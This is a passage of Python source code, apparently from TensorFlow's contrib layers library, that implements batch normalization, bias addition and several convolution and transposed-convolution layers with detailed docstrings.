update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
with ops.control_dependencies(
[update_moving_mean, update_moving_variance]):
return array_ops.identity(outputs)
outputs = utils.smart_cond(is_training, _force_updates, no_updates)
else:
moving_vars_fn = lambda: (moving_mean, moving_variance)
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
outputs.set_shape(inputs_shape)
if original_shape.ndims == 2:
outputs = array_ops.reshape(outputs, array_ops.shape(original_inputs))
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def batch_norm(inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
param_initializers=None,
param_regularizers=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
batch_weights=None,
fused=None,
data_format=DATA_FORMAT_NHWC,
zero_debias_moving_mean=False,
scope=None,
renorm=False,
renorm_clipping=None,
renorm_decay=0.99):
"""Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Can be used as a normalizer function for conv2d and fully_connected.
Note: when training, the moving_mean and moving_variance need to be updated.
By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
need to be added as a dependency to the `train_op`. For example:
```python
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss)
```
One can set updates_collections=None to force the updates in place, but that
can have a speed penalty, especially in distributed settings.
Args:
inputs: A tensor with 2 or more dimensions, where the first dimension has
`batch_size`. The normalization is over all but the last dimension if
`data_format` is `NHWC` and the second dimension if `data_format` is
`NCHW`.
decay: Decay for the moving average. Reasonable values for `decay` are close
to 1.0, typically in the multiple-nines range: 0.999, 0.99, 0.9, etc.
Lower `decay` value (recommend trying `decay`=0.9) if model experiences
reasonably good training performance but poor validation and/or test
performance. Try zero_debias_moving_mean=True for improved stability.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
epsilon: Small float added to variance to avoid dividing by zero.
activation_fn: Activation function, default set to None to skip it and
maintain a linear activation.
param_initializers: Optional initializers for beta, gamma, moving mean and
moving variance.
param_regularizers: Optional regularizer for beta and gamma.
updates_collections: Collections to collect the update ops for computation.
The updates_ops need to be executed with the train_op.
If None, a control dependency would be added to make sure the updates are
computed in place.
is_training: Whether or not the layer is in training mode. In training mode
it would accumulate the statistics of the moments into `moving_mean` and
`moving_variance` using an exponential moving average with the given
`decay`. When it is not in training mode then it would use the values of
the `moving_mean` and the `moving_variance`.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional collections for the variables.
outputs_collections: Collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
batch_weights: An optional tensor of shape `[batch_size]`,
containing a frequency weight for each batch item. If present,
then the batch normalization uses weighted mean and
variance. (This can be used to correct for bias in training
example selection.)
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
zero_debias_moving_mean: Use zero_debias for moving_mean. It creates a new
pair of variables 'moving_mean/biased' and 'moving_mean/local_step'.
scope: Optional scope for `variable_scope`.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_decay: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `decay` is still applied
to get the means and variances for inference.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
ValueError: If the rank of `inputs` is undefined.
ValueError: If rank or channels dimension of `inputs` is undefined.
"""
# This environment variable is only used during the testing period of fused
# batch norm and will be removed after that.
if fused is None:
fused = _FUSED_DEFAULT
# Only use _fused_batch_norm if all of the following three
# conditions are true:
# (1) fused is set True;
# (2) it is possible to use (currently it doesn't support batch weights,
# renorm, and the case when rank is neither 2 nor 4);
# (3) it is used with zero_debias_moving_mean, or an input shape of rank 2,
# or non-default updates_collections (not implemented in
# normalization_layers.BatchNormalization yet); otherwise use the fused
# implementation in normalization_layers.BatchNormalization.
inputs = ops.convert_to_tensor(inputs)
rank = inputs.get_shape().ndims
possible_to_fuse = batch_weights is None and not renorm and rank in [2, 4]
if fused and possible_to_fuse and (
zero_debias_moving_mean or rank == 2 or
updates_collections is not ops.GraphKeys.UPDATE_OPS):
return _fused_batch_norm(
inputs,
decay=decay,
center=center,
scale=scale,
epsilon=epsilon,
activation_fn=activation_fn,
param_initializers=param_initializers,
updates_collections=updates_collections,
is_training=is_training,
reuse=reuse,
variables_collections=variables_collections,
outputs_collections=outputs_collections,
trainable=trainable,
data_format=data_format,
zero_debias_moving_mean=zero_debias_moving_mean,
scope=scope)
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
layer_variable_getter = _build_variable_getter()
with variable_scope.variable_scope(
scope, 'BatchNorm', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
# Determine whether we can use the core layer class.
if (batch_weights is None and
updates_collections is ops.GraphKeys.UPDATE_OPS and
not zero_debias_moving_mean):
# Use the core layer class.
axis = 1 if data_format == DATA_FORMAT_NCHW else -1
if not param_initializers:
param_initializers = {}
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
if not param_regularizers:
param_regularizers = {}
beta_regularizer = param_regularizers.get('beta')
gamma_regularizer = param_regularizers.get('gamma')
layer = normalization_layers.BatchNormalization(
axis=axis,
momentum=decay,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
trainable=trainable,
renorm=renorm,
renorm_clipping=renorm_clipping,
renorm_momentum=renorm_decay,
name=sc.name,
_scope=sc,
_reuse=reuse,
fused=fused)
outputs = layer.apply(inputs, training=is_training)
# Add variables to collections.
_add_variable_to_collections(
layer.moving_mean, variables_collections, 'moving_mean')
_add_variable_to_collections(
layer.moving_variance, variables_collections, 'moving_variance')
if layer.beta is not None:
_add_variable_to_collections(layer.beta, variables_collections, 'beta')
if layer.gamma is not None:
_add_variable_to_collections(
layer.gamma, variables_collections, 'gamma')
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
# Not supported by layer class: batch_weights argument,
# and custom updates_collections. In that case, use the legacy BN
# implementation.
# Custom updates collections are not supported because the update logic
# is different in this case, in particular w.r.t. "forced updates" and
# update op reuse.
if renorm:
raise ValueError('renorm is not supported with batch_weights, '
'updates_collections or zero_debias_moving_mean')
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
if batch_weights is not None:
batch_weights = ops.convert_to_tensor(batch_weights)
inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
# Reshape batch weight values so they broadcast across inputs.
nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
batch_weights = array_ops.reshape(batch_weights, nshape)
if data_format == DATA_FORMAT_NCHW:
moments_axes = [0] + list(range(2, inputs_rank))
params_shape = inputs_shape[1:2]
# For NCHW format, rather than relying on implicit broadcasting, we
# explicitly reshape the params to params_shape_broadcast when computing
# the moments and the batch normalization.
params_shape_broadcast = list(
[1, inputs_shape[1].value] + [1 for _ in range(2, inputs_rank)])
else:
moments_axes = list(range(inputs_rank - 1))
params_shape = inputs_shape[-1:]
params_shape_broadcast = None
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined channels dimension %s.' % (
inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if not param_initializers:
param_initializers = {}
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
beta = variables.model_variable('beta',
shape=params_shape,
dtype=dtype,
initializer=beta_initializer,
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
gamma = variables.model_variable('gamma',
shape=params_shape,
dtype=dtype,
initializer=gamma_initializer,
collections=gamma_collections,
trainable=trainable)
# Create moving_mean and moving_variance variables and add them to the
# appropriate collections. We disable variable partitioning while creating
# them, because assign_moving_average is not yet supported for partitioned
# variables.
partitioner = variable_scope.get_variable_scope().partitioner
try:
variable_scope.get_variable_scope().set_partitioner(None)
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=moving_mean_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=moving_variance_initializer,
trainable=False,
collections=moving_variance_collections)
finally:
variable_scope.get_variable_scope().set_partitioner(partitioner)
# If `is_training` doesn't have a constant value, because it is a `Tensor`,
# a `Variable` or `Placeholder` then is_training_value will be None and
# `needs_moments` will be true.
is_training_value = utils.constant_value(is_training)
need_moments = is_training_value is None or is_training_value
if need_moments:
# Calculate the moments based on the individual batch.
if batch_weights is None:
if data_format == DATA_FORMAT_NCHW:
mean, variance = nn.moments(inputs, moments_axes, keep_dims=True)
mean = array_ops.reshape(mean, [-1])
variance = array_ops.reshape(variance, [-1])
else:
mean, variance = nn.moments(inputs, moments_axes)
else:
if data_format == DATA_FORMAT_NCHW:
mean, variance = nn.weighted_moments(inputs, moments_axes,
batch_weights, keep_dims=True)
mean = array_ops.reshape(mean, [-1])
variance = array_ops.reshape(variance, [-1])
else:
mean, variance = nn.weighted_moments(inputs, moments_axes,
batch_weights)
moving_vars_fn = lambda: (moving_mean, moving_variance)
if updates_collections is None:
def _force_updates():
"""Internal function forces updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
with ops.control_dependencies([update_moving_mean,
update_moving_variance]):
return array_ops.identity(mean), array_ops.identity(variance)
mean, variance = utils.smart_cond(is_training,
_force_updates,
moving_vars_fn)
else:
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
# Use computed moments during training and moving_vars otherwise.
vars_fn = lambda: (mean, variance)
mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
else:
mean, variance = moving_mean, moving_variance
if data_format == DATA_FORMAT_NCHW:
mean = array_ops.reshape(mean, params_shape_broadcast)
variance = array_ops.reshape(variance, params_shape_broadcast)
if beta is not None:
beta = array_ops.reshape(beta, params_shape_broadcast)
if gamma is not None:
gamma = array_ops.reshape(gamma, params_shape_broadcast)
# Compute batch_normalization.
outputs = nn.batch_normalization(inputs, mean, variance, beta, gamma,
epsilon)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def bias_add(inputs,
activation_fn=None,
initializer=init_ops.zeros_initializer(),
regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
data_format=DATA_FORMAT_NHWC,
scope=None):
"""Adds a bias to the inputs.
Can be used as a normalizer function for conv2d and fully_connected.
Args:
inputs: A tensor of with at least rank 2 and value for the last dimension,
e.g. `[batch_size, depth]`, `[None, None, None, depth]`.
activation_fn: Activation function, default set to None to skip it and
maintain a linear activation.
initializer: An initializer for the bias, defaults to 0.
regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional collections for the variables.
outputs_collections: Collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
data_format: A string. 'NHWC' and 'NCHW' are supported.
scope: Optional scope for variable_scope.
Returns:
A tensor representing the result of adding biases to the inputs.
Raises:
ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
ValueError: If `data_format` is `NCHW` and rank of `inputs` is not 4.
ValueError: If the rank of `inputs` is undefined.
ValueError: If rank or `C` dimension of `inputs` is undefined.
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with variable_scope.variable_scope(scope, 'BiasAdd', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Dims of shape must be known but is None')
elif inputs_rank != 4 and data_format == DATA_FORMAT_NCHW:
raise ValueError('Data format NCHW only supports 4D Tensor')
axis = 1 if data_format == DATA_FORMAT_NCHW else -1
num_features = inputs_shape[axis].value
if num_features is None:
raise ValueError('`C` dimension must be known but is None')
biases_collections = utils.get_variable_collections(variables_collections,
'biases')
biases = variables.model_variable('biases',
shape=[num_features,],
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(inputs, biases, data_format=data_format)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
# TODO(jbms): change `rate` parameter to `dilation_rate` for consistency with
# underlying op.
@add_arg_scope
def convolution(inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
data_format=None,
rate=1,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds an N-D convolution followed by an optional batch_norm layer.
It is required that 1 <= N <= 3.
`convolution` creates a variable called `weights`, representing the
convolutional kernel, that is convolved (actually cross-correlated) with the
`inputs` to produce a `Tensor` of activations. If a `normalizer_fn` is
provided (such as `batch_norm`), it is then applied. Otherwise, if
`normalizer_fn` is None and a `biases_initializer` is provided then a `biases`
variable would be created and added the activations. Finally, if
`activation_fn` is not `None`, it is applied to the activations as well.
Performs atrous convolution with input stride/dilation rate equal to `rate`
if a value > 1 for any dimension of `rate` is specified. In this case
`stride` values != 1 are not supported.
Args:
inputs: A Tensor of rank N+2 of shape
`[batch_size] + input_spatial_shape + [in_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, in_channels] + input_spatial_shape` if data_format starts
with "NC".
num_outputs: Integer, the number of output filters.
kernel_size: A sequence of N positive integers specifying the spatial
dimensions of the filters. Can be a single integer to specify the same
value for all spatial dimensions.
stride: A sequence of N positive integers specifying the stride at which to
compute output. Can be a single integer to specify the same value for all
spatial dimensions. Specifying any `stride` value != 1 is incompatible
with specifying any `rate` value != 1.
padding: One of `"VALID"` or `"SAME"`.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
rate: A sequence of N positive integers specifying the dilation rate to use
for atrous convolution. Can be a single integer to specify the same
value for all spatial dimensions. Specifying any `rate` value != 1 is
incompatible with specifying any `stride` value != 1.
activation_fn: Activation function. The default value is a ReLU function.
Explicitly set it to None to skip it and maintain a linear activation.
normalizer_fn: Normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: Normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: Collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_scope`.
Returns:
A tensor representing the output of the operation.
Raises:
ValueError: If `data_format` is invalid.
ValueError: Both 'rate' and `stride` are not uniformly 1.
"""
if data_format not in [None, 'NWC', 'NCW', 'NHWC', 'NCHW', 'NDHWC', 'NCDHW']:
raise ValueError('Invalid data_format: %r' % (data_format,))
layer_variable_getter = _build_variable_getter(
{'bias': 'biases', 'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'Conv', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
input_rank = inputs.get_shape().ndims
if input_rank == 3:
layer_class = convolutional_layers.Convolution1D
elif input_rank == 4:
layer_class = convolutional_layers.Convolution2D
elif input_rank == 5:
layer_class = convolutional_layers.Convolution3D
else:
raise ValueError('Convolution not supported for input with rank',
input_rank)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = layer_class(filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
dilation_rate=rate,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.use_bias:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
convolution2d = convolution
convolution3d = convolution
@add_arg_scope
def convolution2d_in_plane(
inputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Performs the same in-plane convolution to each channel independently.
This is useful for performing various simple channel-independent convolution
operations such as image gradients:
image = tf.constant(..., shape=(16, 240, 320, 3))
vert_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[2, 1])
horz_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[1, 2])
Args:
inputs: A 4-D tensor with dimensions [batch_size, height, width, channels].
kernel_size: A list of length 2 holding the [kernel_height, kernel_width] of
of the pooling. Can be an int if both values are the same.
stride: A list of length 2 `[stride_height, stride_width]`.
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: The padding type to use, either 'SAME' or 'VALID'.
activation_fn: Activation function. The default value is a ReLU function.
Explicitly set it to None to skip it and maintain a linear activation.
normalizer_fn: Normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: Normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: Collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_scope`.
Returns:
A `Tensor` representing the output of the operation.
"""
with variable_scope.variable_scope(
scope, 'ConvInPlane', [inputs], reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, 1, 1]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
depthwise_weights = array_ops.tile(weights, [1, 1, num_filters_in, 1])
outputs = nn.depthwise_conv2d(inputs, depthwise_weights,
[1, stride_h, stride_w, 1], padding)
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_filters_in,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
data_format=DATA_FORMAT_NHWC,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a convolution2d_transpose with an optional batch normalization layer.
The function creates a variable called `weights`, representing the
kernel, that is convolved with the input. If `normalizer_fn` is `None`, a
second variable called 'biases' is added to the result of the operation.
Args:
inputs: A 4-D `Tensor` of type `float` and shape
`[batch, height, width, in_channels]` for `NHWC` data format or
`[batch, in_channels, height, width]` for `NCHW` data format.
num_outputs: Integer, the number of output filters.
kernel_size: A list of length 2 holding the [kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
stride: A list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: One of 'VALID' or 'SAME'.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
activation_fn: Activation function. The default value is a ReLU function.
Explicitly set it to None to skip it and maintain a linear activation.
normalizer_fn: Normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: Normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: Collection to add the outputs.
trainable: Whether or not the variables should be trainable or not.
scope: Optional scope for variable_scope.
Returns:
A tensor representing the output of the operation.
Raises:
ValueError: If 'kernel_size' is not a list of length 2.
ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
ValueError: If `C` dimension of `inputs` is None.
"""
layer_variable_getter = _build_variable_getter(
{'bias': 'biases', 'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'Conv2d_transpose', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = convolutional_layers.Convolution2DTranspose(
filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.bias:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def convolution3d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
data_format=DATA_FORMAT_NDHWC,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a convolution3d_transpose with an optional batch normalization layer.
The function creates a variable called `weights`, representing the
kernel, that is convolved with the input. If `batch_norm_params` is `None`, a
second variable called 'biases' is added to the result of the operation.
Args:
inputs: A 5-D `Tensor` of type `float` and shape
`[batch, depth, height, width, in_channels]` for `NDHWC` data format or
`[batch, in_channels, depth, height, width]` for `NCDHW` data format.
num_outputs: Integer, the number of output filters.
kernel_size: A list of length 3 holding the [kernel_depth, kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
stride: A list of length 3: [stride_depth, stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: One of 'VALID' or 'SAME'.
data_format: A string. `NDHWC` (default) and `NCDHW` are supported.
activation_fn: Activation function. The default value is a ReLU function.
Explicitly set it to None to skip it and maintain a linear activation.
normalizer_fn: Normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: Normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: Collection to add the outputs.
trainable: Whether or not the variables should be trainable or not.
scope: Optional scope for variable_scope.
Returns:
A tensor representing the output of the operation.
Raises:
ValueError: If 'kernel_size' is not a list of length 3.
ValueError: If `data_format` is neither `NDHWC` nor `NCDHW`.
ValueError: If `C` dimension of `inputs` is None.
"""
layer_variable_getter = _build_variable_getter(
{'bias': 'biases', 'kernel': 'weights'})
with variable_scope.variable_scope(
scope, 'Conv3d_transpose', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
raise ValueError('data_format has to be either NCDHW or NDHWC.')
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = convolutional_layers.Convolution3DTranspose(
filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
